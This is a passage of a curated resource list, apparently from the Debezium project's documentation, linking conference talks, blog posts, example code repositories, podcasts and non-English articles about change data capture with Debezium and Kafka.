https:\/\/www.slideshare.net\/nfrankel\/london-inmemory-computing-meetup-a-changedatacapture-usecase-designing-an-evergreen-cache[\"A Change-Data-Capture use-case: designing an evergreen cache\"] by Nicolas Fr\u00e4nkel\n* https:\/\/www.youtube.com\/watch?v=6nU9i022yeY[\"Microservices & Data: Implementing the Outbox Pattern with Debezium\"] by Thorben Janssen\n* \"Practical Change Data Streaming Use Cases With Apache Kafka and Debezium\" (https:\/\/www.infoq.com\/presentations\/data-streaming-kafka-debezium\/[recording], https:\/\/speakerdeck.com\/gunnarmorling\/practical-change-data-streaming-use-cases-with-apache-kafka-and-debezium-qcon-san-francisco-2019[slides]) by Gunnar Morling; QCon San Francisco 2019; JokerConf St. Petersburg 2019\n* https:\/\/speakerdeck.com\/jbfletch\/using-kafka-to-discover-events-hidden-in-your-database[\"Using Kafka to Discover Events Hidden in your Database\"] by Anna McDonald; Kafka Summit San Francisco 2019\n* https:\/\/databricks.com\/session_eu19\/modern-etl-pipelines-with-change-data-capture[\"Modern ETL Pipelines with Change Data Capture\"] by Thiago Rigo and David Mariassy; Spark and AI Summit Europe 2019\n* https:\/\/www.infoq.com\/news\/2019\/04\/change-data-capture-debezium\/[\"Creating Events from Databases Using Change Data Capture: Gunnar Morling at MicroXchg Berlin\"] by Jan Stenberg; a session report from MicroXchg\n* https:\/\/developers.redhat.com\/videos\/youtube\/QYbXDp4Vu-8\/[\"Change Data Streaming Patterns for Microservices With Debezium\"] by Gunnar Morling; 30 min webinar with live demo, February 2019\n* https:\/\/www.slideshare.net\/MikeFowler28\/migrating-with-debezium[\"Migrating with Debezium\"] by Mike Fowler; London PostgreSQL Meetup, January 2019\n* \"The Why's and How's of Database Streaming\" by Joy Gao (https:\/\/www.infoq.com\/presentations\/wepay-database-streaming[recording], https:\/\/qconsf.com\/system\/files\/presentation-slides\/whys_and_hows_of_database_streaming_final.pdf[slides]), QCon San Francisco, 2018\n* \"Change Data Streaming Patterns for Microservices With Debezium\" by Gunnar Morling (https:\/\/www.youtube.com\/watch?v=NawsloOoFo0[video recording], https:\/\/speakerdeck.com\/gunnarmorling\/data-streaming-for-microservices-using-debezium[slides]), Voxxed Microservices Paris 2018; https:\/\/www.confluent.io\/kafka-summit-sf18\/change-data-streaming-patterns-for-microservices-with-debezium[recording and slides] from Kafka Summit San Francisco 2018\n* https:\/\/speakerdeck.com\/rk3rn3r\/i-need-my-data-and-a-little-bit-of-your-data-dot-integrating-services-with-apache-kafka-confluent-streaming-event-munich[\"I need my data and a little bit of your data.\" - Integrating services with Apache Kafka] by https:\/\/twitter.com\/rk3rn3r\/[Ren\u00e9 Kerner]; Confluent Streaming Event Munich 2018\n* https:\/\/aiven.io\/assets\/img\/blog\/zalando-kafka-cdc-presentation.pdf[\"PG Change Data Capture with Debezium\"] by Hannu Valtonen; Kafka Meetup Helsinki 2018\n* https:\/\/de.slideshare.net\/FrankLyaruu\/embracing-database-diversity-with-kafka-and-debezium[\"Embracing Database Diversity with Kafka and Debezium\"] by Frank Lyaruu; VoxxedDays Vienna 2018\n* https:\/\/speakerdeck.com\/japoneizo\/syncing-data-between-microservices-using-debezium-and-apache-kafka[\"Syncing data between microservices using Debezium and Apache Kafka\"] by Eizo Nishime; The Developer's Conference S\u00e3o Paulo 2018\n* https:\/\/www.slideshare.net\/kgwap\/kafka-connect-debezium?ref=http:\/\/kasundon.com\/2018\/07\/08\/streaming-mysql-change-sets-to-kafka-aws-kinesis\/[\"Kafka Connect - Debezium; Stream MySQL Events to Kafka\"] by Kasun Don; 2018\n* \"Streaming Database Changes with Debezium\" by Gunnar Morling (https:\/\/www.youtube.com\/watch?v=IOZ2Um6e430[Video recording] from Devoxx 2017; https:\/\/speakerdeck.com\/gunnarmorling\/data-streaming-for-microservices-using-debezium[Slides] from RivieraDev 2018)\n* https:\/\/speakerdeck.com\/xenji\/kafka-and-debezium-at-trivago-code-dot-talks-2017-edition\"[\"Kafka and Debezium at trivago\"] by https:\/\/twitter.com\/xenji\/[Mario M\u00fcller] and https:\/\/twitter.com\/rk3rn3r\/[Ren\u00e9 Kerner]; Code.Talks 2017\n* https:\/\/vimeo.com\/168409093[\"Event Sourcing with Debezium and Kafka\"] by Christian Posta; 2016\n\n== Blog Posts & Articles\n\n* https:\/\/medium.com\/modanisa-engineering\/integrating-grafana-notifications-with-gitlab-pipeline-to-restart-debezium-tasks-using-go-1378c9eaf7b8[\"Integrating Grafana Notifications with GitLab Pipeline to restart Debezium tasks using Go\"] by Abdulsamet \u0130LER\u0130\n* https:\/\/www.reddit.com\/r\/RedditEng\/comments\/qkfx7a\/change_data_capture_with_debezium\/[\"Change Data Capture with Debezium\"] by Adriel Velazquez and Alan Tai\n* https:\/\/medium.com\/cermati-tech\/practical-notes-in-change-data-capture-with-debezium-and-postgres-fe31bb11ab78[\"Practical Notes in Change Data Capture with Debezium and Postgres\"] by Sharath Gururaj\n* https:\/\/medium.com\/google-cloud\/change-data-capture-with-debezium-server-on-gke-from-cloudsql-for-postgresql-to-pub-sub-d1c0b92baa98[\"Change Data Capture with Debezium Server on GKE from CloudSQL for PostgreSQL to Pub\/Sub\"] by Berker Narol\n* https:\/\/vkontech.com\/mongodb-change-data-capture-via-debezium-kafka-connector-with-a-net-5-client\/[\"MongoDB Change Data Capture via Debezium Kafka Connector with a .NET 5 Client\"] by Vasil Kosturski\n* https:\/\/engineering.outschool.com\/posts\/journey-to-better-search\/[\"The Journey to Better Search\"] by Jess Monroe, Nuria Ruiz and Parima Shah\n* https:\/\/snourian.com\/reliable-messaging-outbox-pattern-kafka-debezium-oracle-micronaut-kubernetes\/[\"Reliable Messaging in Microservices \u2013 Implementing Outbox Pattern using Kafka, Debezium, Micronaut, and Oracle Database on Kubernetes\"] by Sina Nourian\n* https:\/\/vkontech.com\/mongodb-change-data-capture-via-debezium-kafka-connector-with-a-net-5-client\/[\"MongoDB Change Data Capture via Debezium Kafka Connector with a .NET 5 Client\"] by Vasil Kosturski\n* https:\/\/www.wix.engineering\/post\/the-reactive-monolith-how-to-move-from-crud-to-event-sourcing[\"The Reactive Monolith - How to Move from CRUD to Event Sourcing\"] by Jonathan David\n* https:\/\/techcommunity.microsoft.com\/t5\/azure-database-for-mysql\/cdc-in-azure-database-for-mysql-flexible-server-using-kafka\/ba-p\/2780943[\"\nCDC in Azure Database for MySQL \u2013 Flexible Server using Kafka, Debezium, and Azure Event Hubs\"] by Sudheesh Narayanaswamy\n* https:\/\/vectorized.io\/blog\/redpanda-debezium\/[\"Using Debezium and Redpanda for CDC\"] by Almas Maksotov\n* https:\/\/medium.com\/event-driven-utopia\/understanding-materialized-views-3-stream-table-joins-with-cdc-77591d2d6fa0[\"Understanding Materialized Views \u2014 Stream-Table Joins with CDC\"] by Dunith Dhanushka\n* https:\/\/materialize.com\/change-data-capture-is-having-a-moment-why[\"Change Data Capture is having a moment. Why?\"] by Andy Hattemer\n* https:\/\/braindose.blog\/2021\/09\/13\/true-atomic-microservices-debezium\/[\"A True Atomic Microservices Implementation with Debezium to Ensure Data Consistency\"] by CK Gan\n* https:\/\/itnext.io\/hydrating-a-data-lake-using-log-based-change-data-capture-cdc-with-debezium-apicurio-and-kafka-799671e0012f[\"Hydrating a Data Lake using Log-based Change Data Capture (CDC) with Debezium, Apicurio, and Kafka Connect on AWS\"] by Gary A. Stafford\n* Change Data Capture (CDC) With Kafka Connect and the Debezium Cassandra Connector (https:\/\/www.instaclustr.com\/change-data-capture-cdc-with-kafka-and-debezium\/[Part 1], https:\/\/www.instaclustr.com\/change-data-capture-cdc-with-kafka-connect-and-the-debezium-cassandra-connector-part-2\/[Part 2]) by Paul Brebner\n* https:\/\/docs.microsoft.com\/en-us\/samples\/azure-samples\/azure-sql-db-change-stream-debezium\/smart-bulk-copy\/[\"Azure SQL \/ SQL Server Change Stream with Debezium\"] by Davide Mauri\n* https:\/\/developers.redhat.com\/articles\/2021\/06\/14\/application-modernization-patterns-apache-kafka-debezium-and-kubernetes[\"Application modernization patterns with Apache Kafka, Debezium, and Kubernetes\"] by Bilgin Ibryam\n* https:\/\/eresh-gorantla.medium.com\/change-data-capture-use-cases-and-real-world-example-using-debezium-fe4098579d49[\"Change Data Capture, Use Cases and real-world example using Debezium\"] by Eresh Gorantla\n* https:\/\/medium.com\/event-driven-utopia\/configuring-debezium-to-capture-postgresql-changes-with-docker-compose-224742ca5372[\"Configuring Debezium to Capture PostgreSQL Changes with Docker Compose\"] by Dunith Dhanushka\n* https:\/\/developers.redhat.com\/articles\/2021\/07\/30\/avoiding-dual-writes-event-driven-applications[\"Avoiding dual writes in event-driven applications\"] by Bernard Tison\n* https:\/\/dev.to\/foolonthehill\/build-a-event-driven-app-with-micronaut-kafka-and-debezium-11be[\"Build a event-driven app with Micronaut, Kafka and Debezium\"] by George Oliveira\n* https:\/\/pradeepdaniel.medium.com\/real-time-change-data-replication-to-snowflake-using-kafka-and-debezium-d6ebb0d4eb29[\"Creating an ETL data pipeline to sync data to Snowflake using Kafka and Debezium\"] by Pradeep Daniel \n* http:\/\/www.greentechjava.com\/2021\/07\/streaming-nrt-data-with-kafka-connect.html[\"Streaming NRT data with kafka connect and Debezium \"] by Akash Sharma\n* https:\/\/thedataguy.in\/integrate-debezium-with-aws-secret-manager-for-retrieving-passwords\/[\"Integrate Debezium with AWS Secret Manager For Retrieving Passwords\"] by Bhuvanesh\n* https:\/\/www.rtinsights.com\/application-modernization-and-change-data-capture\/[\"Application Modernization and Change Data Capture\"] by Salvatore Salamone\n* https:\/\/daily.dev\/blog\/building-a-fault-tolerant-event-driven-architecture-with-google-cloud-pulumi-and-debezium[\"Building a fault-tolerant event-driven architecture with Google Cloud, Pulumi and Debezium\"] by Ido Shamun\n* https:\/\/thenewstack.io\/kubernetes-run-analytics-at-the-edge-postgres-kafka-debezium\/[\"Kubernetes-Run Analytics at the Edge: Postgres, Kafka, Debezium\"] by Jonathan Katz\n* https:\/\/www.alibabacloud.com\/blog\/real-time-data-synchronization-based-on-flink-sql-cdc_597750[\"Real-Time Data Synchronization Based on Flink SQL CDC\"] by Wu Chong\n* https:\/\/medium.com\/globant\/change-data-capture-with-debezium-6eb523d57b1c[\"Change Data Capture with Debezium\"] by Ankit Mishra\n* https:\/\/medium.com\/event-driven-utopia\/8-practical-use-cases-of-change-data-capture-8f059da4c3b7[\"8 Practical Use Cases of Change Data Capture\"] by Dunith Dhanushka\n* https:\/\/www.wix.engineering\/post\/change-data-capture-at-deviantart[\"Change Data Capture at DeviantArt\"] by Ruslan Danilin\n* https:\/\/www.infinitecatalog.com\/blog\/2021\/05\/30\/materialized-world.html[\"We Are Living in a Materialized World\"] by Udbhav Gupta\n* https:\/\/smarttechie.org\/2021\/03\/17\/audit-database-changes-with-debezium\/[\"Audit Database Changes with Debezium\"] by Siva Prasad Rao Janapati\n* https:\/\/medium.com\/geekculture\/change-data-capture-using-debezium-ec48631d643a[\"Change Data Capture \u2014 Using Debezium\"] by Ritresh Girdhar\n* https:\/\/lenses.io\/blog\/2021\/04\/change-data-capture-apache-kafka-break-up-monolith\/[\"Change Data Capture and Kafka to break up your monolith\"] by Guillaume Aym\u00e9\n* https:\/\/kvenkatraman.medium.com\/snowflake-near-real-time-ingestion-from-rdbms-using-debezium-and-kafka-92f00e2ee897[\"Snowflake - Near Real-Time Ingestion from RDBMS using Debezium and Kafka\"] by Karthik Venkatraman\n* https:\/\/medium.com\/capital-one-tech\/the-journey-from-batch-to-real-time-with-change-data-capture-c598e56146be[\"The Journey from Batch to Real-time with Change Data Capture\"] by Andrew Bonham\n* https:\/\/tech.willhaben.at\/change-data-capturing-with-debezium-at-willhaben-3579afd8be6b[\"Change Data Capturing with Debezium at willhaben\"] by Maurizio Rinder\n* https:\/\/shopify.engineering\/capturing-every-change-shopify-sharded-monolith[\"Capturing Every Change From Shopify\u2019s Sharded Monolith\"] by John Martin\n* https:\/\/dev.to\/hazelcast\/beyond-hello-world-zero-downtime-deployments-on-kubernetes-162o[\"Beyond 'Hello World': Zero-Downtime Deployments on Kubernetes \"] by Nicolas Frankel\n* https:\/\/lambda.grofers.com\/origins-of-data-lake-at-grofers-6c011f94b86c[\"Origins of Data Lake at Grofers -- Evolution of our data pipelines\"] by Akshay Agarwal\n* https:\/\/ducmanhphan.github.io\/2020-08-09-how-to-work-with-debezium\/[\"How to work with Debezium\"] by Manh Phan\n* https:\/\/reorchestrate.com\/posts\/debezium-performance-impact\/[\"Debezium does not impact source database performance\"] by Mike Seddon\n* https:\/\/medium.com\/incognia-tech\/ensuring-data-consistency-across-services-with-the-transactional-outbox-pattern-90be4d735cb0[\"Ensuring data consistency across services with the Transactional Outbox pattern\"] by Mateus Moury and Rafael Acevedo\n* https:\/\/medium.com\/event-driven-utopia\/a-gentle-introduction-to-event-driven-change-data-capture-683297625f9b[\"A Gentle Introduction to Event-driven Change Data Capture\"] by Dunith Dhanushka\n* https:\/\/maciejszymczyk.medium.com\/change-data-capture-convert-your-database-into-a-stream-with-debezium-356c1a49b459[\"Change Data Capture \u2014 Convert your database into a stream with Debezium\"] by Maciej Szymczyk\n* https:\/\/info.crunchydata.com\/blog\/postgres-change-data-capture-with-debezium[\"Change Data Capture in Postgres With Debezium\"] by Dave Cramer\n* https:\/\/medium.com\/apache-pinot-developer-blog\/change-data-analysis-with-debezium-and-apache-pinot-b4093dc178a7[\"Change Data Analysis with Debezium and Apache Pinot\"] by Kenny Bastani\n* https:\/\/juliuskrah.com\/blog\/2020\/01\/06\/streaming-changes-from-keycloak-using-debezium-cdc\/[\"Streaming Changes from Keycloak using Debezium (CDC)\"] by Julius Krah\n* https:\/\/www.tigeranalytics.com\/blog\/building-nrt-data-pipeline-debezium-kafka-snowflake\/[\"Building a Near-Real Time (NRT) Data Pipeline using Debezium, Kafka, and Snowflake\"] by Arun Kumar Ponnurangam and Karunakar Goud\n* https:\/\/medium.com\/data-rocks\/creating-a-no-code-aws-native-oltp-to-olap-data-pipeline-part-1-50481b57dc30[\"Creating a no-code AWS native OLTP to OLAP data pipeline \u2014 Part 1\"] by Haris Michailidis\n* https:\/\/www.zuehlke.com\/en\/insights\/design-failure-distributed-transactions-microservices[\"Design for Failure \u2014 Distributed Transactions in Microservices\"] by Darren Boo\n* https:\/\/blog.rafaelgss.com.br\/autonomous-microservices[\"Autonomous Microservices - Outbox Pattern\"] by Rafael Gonzaga\n* https:\/\/medium.com\/trendyol-tech\/debezium-with-simple-message-transformation-smt-4f5a80c85358[\"Debezium with Simple Message Transformation (SMT)\"] by Okan Yildirim\n* https:\/\/www.systemcraftsman.com\/2020\/11\/30\/asap-the-storified-demo-of-introduction-to-debezium-and-kafka-on-kubernetes\/[\"ASAP! \u2013 The Storified Demo of Introduction to Debezium and Kafka on Kubernetes\"] by Aykut Bulgu\n* https:\/\/elephanttamer.net\/?p=50[\"Setting up PostgreSQL for Debezium\"] by Micha\u0142 Mackiewicz\n* https:\/\/medium.com\/@midhunsukumaran.mec\/a-year-and-a-half-with-debezium-f4f323b4909d[\"A year and a half with Debezium: CDC With MySQL\"] by Midhun Sukumaran\n* https:\/\/jet-start.sh\/blog\/2020\/10\/06\/enabling-full-text-search[\"Enabling Full-text Search with Change Data Capture in a Legacy Application\"] by Franti\u0161ek Hartman\n* https:\/\/medium.com\/@sumant.rana\/sync-mysql-to-postgresql-using-debezium-and-kafkaconnect-d6612489fd64[\"Sync MySQL to PostgreSQL using Debezium and Kafka Connect\"] by Sumant Rana\n* https:\/\/turkogluc.com\/postgresql-capture-data-change-with-debezium\/[\"Making Sense of Change Data Capture Pipelines for Postgres with Debezium Kafka Connector\"] by Cemal Turkoglu\n* https:\/\/reveation-labs.medium.com\/streaming-events-from-sql-server-to-event-hub-in-azure-using-debezium-55dfd1a0e214[\"Streaming Events from SQL Server to Event Hub in Azure using Debezium\"] by Reveation Labs\n* https:\/\/developers.redhat.com\/cheat-sheets\/debezium-openshift-cheat-sheet[\"Debezium on OpenShift Cheat Sheet\"] by Abdellatif Bouchama\n* https:\/\/medium.com\/data-rocks\/managing-kafka-connectors-at-scale-using-kafka-connect-manager-kcm-31d887de033c[\"Managing Kafka Connectors at scale using Kafka Connect Manager\"] by Sandeep Mehta\n* https:\/\/medium.com\/dana-engineering\/streaming-data-changes-in-mysql-into-elasticsearch-using-debezium-kafka-and-confluent-jdbc-sink-8890ad221ccf[\"How to stream data changes from MySQL into Elasticsearch using Debezium\"] by Rizqi Nugroho\n* https:\/\/medium.com\/@changeant\/implementing-the-transactional-outbox-pattern-with-debezium-in-quarkus-f2680306951[\"Implementing the Transactional Outbox pattern with Debezium in Quarkus\"] by Iain Porter\n* https:\/\/www.confluent.io\/blog\/cdc-and-streaming-analytics-using-debezium-kafka\/[\"Analysing Changes with Debezium and Kafka Streams\"] by Mike Fowler\n* https:\/\/medium.com\/@bogdan.dina03\/de-coupling-yourself-507a15fa100d[\"(De)coupling yourself\"] by Dina Bogdan\n* https:\/\/medium.com\/comsystoreply\/stream-your-database-into-kafka-with-debezium-a94b2f649664[\"Stream Your Database into Kafka with Debezium -- An Introduction and Experience Report\"] by David Hettler\n* https:\/\/medium.com\/@limadelrey\/kafka-connect-how-to-create-a-real-time-data-pipeline-using-change-data-capture-cdc-c60e06e5306a[\"Kafka Connect: How to create a real time data pipeline using Change Data Capture (CDC)\"] by Francisco Lima\n* https:\/\/dev.to\/abhirockzz\/tutorial-set-up-a-change-data-capture-architecture-on-azure-using-debezium-postgres-and-kafka-49h6[\"Tutorial: Set up a Change Data Capture architecture on Azure using Debezium, Postgres and Kafka \"] by Abhishek Gupta\n* Kafka Connect \u2013 Offset commit errors by Javier Holguera: https:\/\/www.javierholguera.com\/2020\/06\/02\/kafka-connect-offset-commit-errors-i\/[Part 1], https:\/\/www.javierholguera.com\/2020\/06\/16\/kafka-connect-offset-commit-errors-ii\/[Part 2]\n* https:\/\/medium.com\/@samuel_vdc\/data-liberation-pattern-using-debezium-engine-4fd32b92d826[\"Data liberation pattern using the Debezium engine\"] by Samuel Vandecasteele\n* https:\/\/medium.com\/hepsiburadatech\/postgresql-db-change-data-capture-cdc-using-debezium-f1a933174fd8[\"PostgreSql Db Change Data Capture (CDC) Using Debezium\"] by Caner Tosuner\n* http:\/\/www.mastertheboss.com\/jboss-frameworks\/debezium\/getting-started-with-debezium[\"Getting started with Debezium\"] by Francesco Marchioni\n* https:\/\/dev.to\/oryanmoshe\/debezium-custom-converters-timestampconverter-26hh[\"Debezium Custom Converters - TimestampConverter\"] by Oryan Moshe\n* https:\/\/www.gridgain.com\/resources\/blog\/change-data-capture-between-mysql-and-gridgain-debezium[\"Change Data Capture Between MySQL and GridGain With Debezium\"] by Evgenii Zhuravlev\n* https:\/\/cloud.google.com\/blog\/products\/data-analytics\/how-to-move-data-from-mysql-to-bigquery[\"How do I move data from MySQL to BigQuery?\"], discussing usage of the Debezium embedded engine with Google Cloud Dataflow, by Pablo Estrada and Griselda Cuevas\n* https:\/\/mike-costello.github.io\/2020\/04\/01\/Using_Debezium_With_AMQP_Events\/[\"Use CDC to create AMQP Based Events with Apache Camel and Debezium\"] by Michael Costello\n* https:\/\/gennadny.wordpress.com\/2020\/03\/22\/the-dead-philosophers-club-streaming-data-from-sql-server-to-azure-via-debezium-and-apache-kafka\/[\"The Dead Philosophers Club \u2013 Streaming Data from SQL Server to Azure via Debezium and Apache Kafka\"] by Gennady Kostinsky\n* https:\/\/medium.com\/everything-full-stack\/streaming-data-changes-to-a-data-lake-with-debezium-and-delta-lake-pipeline-299821053dc3[\"Streaming data changes to a Data Lake with Debezium and Delta Lake pipeline\"] by Yinon D. Nahamu\n* https:\/\/www.infoq.com\/news\/2020\/01\/cdc-debezium-1-0-final-released\/[\"Change Data Capture Tool Debezium 1.0 Final Released\"] by Jan Stenberg\n* https:\/\/strimzi.io\/2020\/01\/27\/deploying-debezium-with-kafkaconnector-resource.html[\"Deploying Debezium using the new KafkaConnector resource\"] by Tom Bentley\n* https:\/\/www.sderosiaux.com\/articles\/2020\/01\/06\/learnings-from-using-kafka-connect-debezium-postgresql\/[\"Learnings from using Kafka Connect - Debezium - PostgreSQL\"] by St\u00e9phane Derosiaux\n* https:\/\/thedataguy.in\/monitor-debezium-mysql-connector-with-prometheus-and-grafana\/[\"Monitor Debezium MySQL Connector With Prometheus And Grafana\"] by Bhuvanesh\n* http:\/\/www.carbonrider.com\/2019\/11\/16\/change-data-capture-with-apache-kafka-postgresql-kafka-connect-and-debezium\/[\"Change Data Capture with Apache Kafka, PostgreSQL, Kafka Connect and Debezium\"] by Yogesh Jadhav\n* https:\/\/dzone.com\/articles\/implementing-the-outbox-pattern[\"Implementing the Outbox Pattern\"] by Sohan Ganapathy\n* https:\/\/medium.com\/engineering-varo\/event-driven-architecture-and-the-outbox-pattern-569e6fba7216[\"Event-Driven Architecture and the Outbox Pattern\"] by Rod Shokrian\n* https:\/\/medium.com\/convoy-tech\/logs-offsets-near-real-time-elt-with-apache-kafka-snowflake-473da1e4d776[\"Logs & Offsets: (Near) Real Time ELT with Apache Kafka + Snowflake\"] by Adrian Kreuziger\n* https:\/\/info.crunchydata.com\/blog\/postgresql-change-data-capture-with-debezium[\"PostgreSQL Change Data Capture With Debezium\"] by Dave Cramer\n* https:\/\/developers.redhat.com\/blog\/2019\/09\/03\/cdc-pipeline-with-red-hat-amq-streams-and-red-hat-fuse\/[\"CDC pipeline with Red Hat AMQ Streams and Red Hat Fuse\"] by Sadhana Nandakumar\n* https:\/\/mauridb.medium.com\/sql-server-change-stream-b204c0892641[\"SQL Server Change Stream\"] by Davide Mauri\n* https:\/\/medium.com\/@hpgrahsl\/communicating-data-changes-across-service-boundaries-safely-129c4eb5db8[\"Communicating Data Changes Across Service Boundaries\u2026 Safely!\"] by Hans-Peter Grahsl\n* https:\/\/blog.clairvoyantsoft.com\/mysql-cdc-with-apache-kafka-and-debezium-3d45c00762e4[\"MySQL CDC with Apache Kafka and Debezium\"] by Kushal Yellam\n* https:\/\/thoughts-on-java.org\/outbox-pattern-with-cdc-and-debezium\/[\"Implementing the Outbox Pattern with CDC using Debezium\"] by Thorben Janssen\n* https:\/\/blog.zhaw.ch\/splab\/2019\/05\/03\/serverless-plumbing-streaming-mysql-events-to-knative-services\/[\"Serverless Plumbing: Streaming MySQL Events to Knative Services\"] by Mohammed Al-Ameen\n* https:\/\/medium.com\/yotpoengineering\/building-zero-latency-data-lake-using-change-data-capture-f93ef50eb066[\"Building zero-latency data lake using Change Data Capture\"] by Ofir Ventura\n* https:\/\/medium.com\/high-alpha\/data-stream-processing-for-newbies-with-kafka-ksql-and-postgres-c30309cfaaf8[\"Data Stream Processing for Newbies with Kafka, KSQL, and Postgres\"] by Maria Patterson\n* https:\/\/blog.couchbase.com\/kafka-connect-mysql-couchbase-debezium\/[\"Kafka Connect from MySQL to Couchbase with Debezium\"] by Matthew Groves\n* https:\/\/www.linkedin.com\/pulse\/change-data-capture-postgresql-via-debezium-part-1-paolo-scarpino\/[\"Change Data Capture on PostgreSQL via Debezium\"] by Paolo Scarpino\n* https:\/\/medium.com\/jw-player-engineering\/southpaw-176aea5f4583[\"Southpaw - Streaming Left Joins with Change Data Capture\"] by Morrigan Jones\n* https:\/\/medium.com\/@hpgrahsl\/connecting-apache-kafka-to-azure-cosmosdb-part-ii-b96cf0f5cdfa[\"Connecting Apache Kafka to Azure CosmosDB\u200a\u2014\u200aPart II\"] by Hans-Peter Grahsl\n* https:\/\/vladmihalcea.com\/how-to-extract-change-data-events-from-mysql-to-kafka-using-debezium\/[\"How to extract change data events from MySQL to Kafka using Debezium\"] by Vlad Mihalcea\n* https:\/\/rmoff.net\/2019\/10\/16\/using-kafka-connect-and-debezium-with-confluent-cloud\/[\"Using Kafka Connect and Debezium with Confluent Cloud\"]\n* https:\/\/rmoff.net\/2019\/11\/20\/streaming-data-from-sql-server-to-kafka-to-snowflake-with-kafka-connect\/[\"Streaming data from SQL Server to Kafka to Snowflake \u2744\ufe0f with Kafka Connect and Debezium\"]\n* https:\/\/rmoff.net\/2018\/03\/24\/streaming-data-from-mysql-into-kafka-with-kafka-connect-and-debezium\/[\"Streaming Data from MySQL into Kafka with Kafka Connect and Debezium\"] by Robin Moffatt\n* https:\/\/rmoff.net\/2018\/03\/27\/streaming-data-from-mongodb-into-kafka-with-kafka-connect-and-debezium\/[\"Streaming Data from MongoDB into Kafka with Kafka Connect and Debezium\"] by Robin Moffatt\n* https:\/\/medium.com\/@tilakpatidar\/streaming-data-from-postgresql-to-kafka-using-debezium-a14a2644906d[\"Streaming data from PostgreSQL to Kafka using Debezium\"] by Tilak Patidar\n* https:\/\/medium.com\/blablacar-tech\/streaming-data-out-of-the-monolith-building-a-highly-reliable-cdc-stack-d71599131acb[\"Streaming Data out of the Monolith: Building a Highly Reliable CDC Stack\"] by Yuancheng Peng\n* https:\/\/iamninad.com\/how-debezium-kafka-stream-can-help-you-write-cdc\/[\"How Debezium & Kafka Streams Can Help You Write CDC Solution\"] by Neenad Ingole\n* https:\/\/jakubbujny.com\/2018\/09\/20\/replicate-cloud-aws-rds-mysql-to-on-premise-postgresql-in-docker-future-is-today-debezium-and-kafka-on-aws-eks\/[Replicate cloud AWS RDS MySQL to on-premise PostgreSQL in Docker \u2013 future is today! Debezium and Kafka on AWS EKS] by Jakub Bujny\n* https:\/\/medium.com\/@mauridb\/sql-server-change-stream-b204c0892641[\"SQL Server Change Stream - Responding to data changes in real time using modern technologies\"]\n* https:\/\/medium.com\/@hpgrahsl\/optimizing-read-access-to-sharded-mongodb-collections-utilizing-apache-kafka-connect-cdcd8ec6228[\"Optimizing Read Access to Sharded MongoDB Collections utilizing Apache Kafka Connect\"] by Hans-Peter Grahsl\n\n== Example Code\n\n* https:\/\/github.com\/debezium\/debezium-examples\/[Debezium's official examples]\n* https:\/\/ibm-cloud-architecture.github.io\/refarch-eda\/use-cases\/db2-debezium\/[DB2 Change Data Capture with Debezium]\n* https:\/\/github.com\/yorek\/debezium-sql-change-stream[\"SQL Server Change Stream sample using Debezium\"] by Davide Mauri\n* https:\/\/github.com\/foogaro\/change-data-capture[\"CDC project based on Debezium, Kafka, MS SQL Server, Infinispan and Teiid, entirely based on containers\"] by Luigi Fugaro\n* https:\/\/github.com\/fvaleri\/cdc[\"CDC with Camel and Debezium: code-driven vs configuration-driven pipelines\"] by Federico Valeri\n* https:\/\/github.com\/morsapaes\/flink-sql-CDC[\"Change Data Capture with Flink SQL and Debezium\"] by Marta Paes\n* https:\/\/github.com\/suadev\/microservices-change-data-capture-with-debezium[\"Microservices Change Data Capture With Debezium\"] by Suat K\u00f6se\n* https:\/\/github.com\/hyagli\/cdc-python-netcore\/[\"Outbox Pattern Implementation using Debezium and Google Protocol Buffers\"] by Huseyin Yagli\n* https:\/\/youtu.be\/fQoTvEtho_4\/[\"Monitoring Kafka Debezium Connector metrics using Prometheus\"] by Waqas Dilawar\n\n== Interviews and Podcasts\n\n* https:\/\/www.youtube.com\/watch?v=yuJ1r_xUcAo[Trino Community Podcast Ep. #25 -- Trino Going Through Changes; together with Ashhar Hasan, Ayush Chauhan, Brian Olsen and Manfred Moser]\n* https:\/\/www.dataengineeringpodcast.com\/debezium-change-data-capture-episode-114\/[Change Data Capture For All Of Your Databases With Debezium -- episode #114 of the Data Engineering Podcast by Tobias Macey; together with Randall Hauch]\n* https:\/\/www.buzzsprout.com\/186154\/1770184[MySQL, Cassandra, BigQuery, and Streaming Analytics with Joy Gao]\n* http:\/\/airhacks.fm\/#episode_57[CDC, Debezium, streaming and Apache Kafka -- episode #57 of Adam Bien's airhacks.fm podcast]\n* https:\/\/www.buzzsprout.com\/186154\/1365043-change-data-capture-with-debezium-ft-gunnar-morling[Change Data Capture with Debezium ft. Gunnar Morling]\n* https:\/\/www.youtube.com\/watch?v=H-yGdKy48VE[Interview with Gunnar Morling] for thoughts-on-java.org\n\n== Other\n\n* https:\/\/www.thoughtworks.com\/radar\/platforms\/debezium[Debezium entry in the ThoughtWorks Technology Radar]\n* https:\/\/learn.openshift.com\/middleware\/debezium-getting-started\/[Getting Started with Debezium on OpenShift]; interactive Debezium learning scenario allowing you to try out Debezium on OpenShift within minutes\n\n== Non-English Resources\n\n* \ud83c\uddea\ud83c\uddf8 https:\/\/www.youtube.com\/watch?v=y2A4x5ZF7dY[\"Iniciaci\u00f3n a CDC con Debezium\"] by Jes\u00fas Pau de la Cruz and Jos\u00e9 Alberto Ruiz Casarrubios (video, Spanish)\n* \ud83c\udde9\ud83c\uddea https:\/\/www.bigdata-insider.de\/was-ist-debezium-a-1044399\/[\"Was ist Debezium?\"] by Stefan Luber (article, German)\n* \ud83c\uddf7\ud83c\uddfa https:\/\/habr.com\/ru\/company\/neoflex\/blog\/567930\/[\"\u041f\u043e\u0442\u043e\u043a\u043e\u0432\u044b\u0439 \u0437\u0430\u0445\u0432\u0430\u0442 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439 \u0438\u0437 PostgreSQL\/MySQL \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Apache Flink\"] by Alex Sergeenko (blog post, Russian)\n* \ud83c\uddea\ud83c\uddf8 https:\/\/www.paradigmadigital.com\/dev\/vistazo-debezium-herramienta-change-data-capture\/[Un vistazo a Debezium: una herramienta completa de Change Data Capture.] by Jesus Pau de la Cruz (blog post, Spanish)\n* \ud83c\udde9\ud83c\uddea https:\/\/decompose.io\/2021\/01\/10\/debezium\/[Debezium] by Teitelberg (blog post, German)\n* \ud83c\udde9\ud83c\uddea https:\/\/blogs.zeiss.com\/digital-innovation\/de\/datenbankaenderungen-teil-2\/[Datenbank\u00e4nderungen erkennen und streamen mit Debezium und Apache Kafka (Teil 2) \u2013 Ein Beispiel] by Richard Mogwitz (blog post, German)\n* 